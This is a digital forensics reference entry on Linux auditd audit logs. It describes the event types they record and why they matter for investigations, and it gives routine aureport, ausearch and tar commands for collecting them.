auditd Audit Logs (audit.log)

Location

Description

Linux Audit daemon logs capturing kernel-level audit events configured via audit rules. Records EXECVE (command execution with full arguments), SYSCALL events, file access (PATH), user authentication (USER_AUTH), and privilege changes.

Forensic Value

auditd provides the most granular Linux visibility available. EXECVE records capture every command executed with full arguments even when shell history is cleared or bypassed. SYSCALL events record file opens, network connections, and privilege changes at the kernel level. The audit trail is tamper-resistant when configured to write to remote syslog. aureport and ausearch enable efficient filtering by event type, user, and timeframe.

Tools Required

Collection Commands

tar czf /forensics/output/audit_logs.tar.gz /var/log/audit/

aureport --summary > /forensics/output/audit_summary.txt

ausearch -m EXECVE --start recent > /forensics/output/audit_execve.txt

ausearch -m USER_AUTH,USER_LOGIN --start today > /forensics/output/audit_auth.txt

Collection Constraints

• •Paths and log sources vary by distribution, init system, logging stack, and installed packages. Validate the active distro and service set before treating absence as meaningful.
• •Centralized log copies may normalize, truncate, or drop fields relative to the original on-host artifact. Preserve the local source when scope and access permit.

MITRE ATT&CK Techniques

References